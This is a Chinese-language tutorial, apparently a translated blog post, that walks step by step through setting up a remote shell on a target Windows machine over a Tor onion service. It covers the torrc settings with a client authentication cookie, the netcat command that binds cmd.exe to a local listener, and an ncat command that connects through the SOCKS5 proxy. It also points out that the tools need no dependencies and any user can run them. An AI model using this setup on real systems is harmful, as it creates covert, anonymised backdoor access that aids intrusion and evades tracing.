首先，我們要在一個Windows Tor客戶端中創(chuàng)建一個Tor onion服務(wù)(即隱藏服務(wù))。我下載了Tor Expert bundle(同樣適用于Tor瀏覽器)-【下載地址】。

然后使用下列命令創(chuàng)建Tor配置文件torrc：

HiddenServiceDir C:\demo\Tor\service HiddenServicePort 8662 127.0.0.1:12345

開啟Tor服務(wù)之后，將會自動創(chuàng)建目錄C:\demo\Tor\Service，并填充一系列必要的文件(<主機名>文件夾包含了這個Toronion服務(wù)的.onion地址)。

該onion服務(wù)將監(jiān)聽端口8662，而流量將會直接轉(zhuǎn)發(fā)到127.0.0.1(端口12345)。

這里我們還可以給服務(wù)開啟客戶端驗證功能，因為如果不開啟這個功能的話，任何知道這個.onion地址和端口號的人都可以進行連接。最基礎(chǔ)的客戶端驗證使用了共享密鑰，你可以使用下列命令進行配置(torrc)：

HiddenServiceAuthorizeClient basic testuser

這里我選擇使用testuser作為客戶端名稱：

接下來，我們可以使用配置文件torrc來開啟Tor：

tor.exe -f torrc

.onion地址以及客戶端驗證cookie可以在service目錄的<主機名>文件夾中找到：

nybjuivgocveiyeq.onion Wa5kOshPqZF4tFynr4ug1g # client: testuser

當然了，你一定要保護認證cookie密鑰的安全。

現(xiàn)在，用nc.exe在目標Windows設(shè)備上開啟服務(wù)(我?guī)啄昵熬驮陔娔X上下載了nc.exe，我不記得原始的URL地址了，我使用的版本是v1.11，MD5為ab41b1e2db77cebd9e2779110ee3915d)：

nc -e cmd.exe -L -s 127.0.0.1 -p 12345

Tor ExpertBundle以及nc.exe不需要任何其他的依賴組件(跟DLL類似)，因此任意用戶都可以直接運行。

現(xiàn)在我們的目標主機已經(jīng)配置好了，在另一臺設(shè)備上，我需要使用包含了認證cookie的配置文件來開啟Tor服務(wù)：

HidServAuth nybjuivgocveiyeq.onion Wa5kOshPqZF4tFynr4ug1g

接下來，我們需要運行ncat，因為ncat.exe支持socks5代理(nc.exe不支持)：

ncat.exe --proxy 127.0.0.1:9050 --proxy-type socks5 nybjuivgocveiyeq.onion 8662

接下來，我們就得到遠程Shell啦!

提醒大家一下，這種方法不適用于ncat v 7.60版本，具體原因請參考【這里】：

ibnsock select_loop(): nsock_loop error 10038: An operation was attempted on somethingthat is not a socket.

關(guān)鍵詞： Tor Onion 執(zhí)行遠程Shell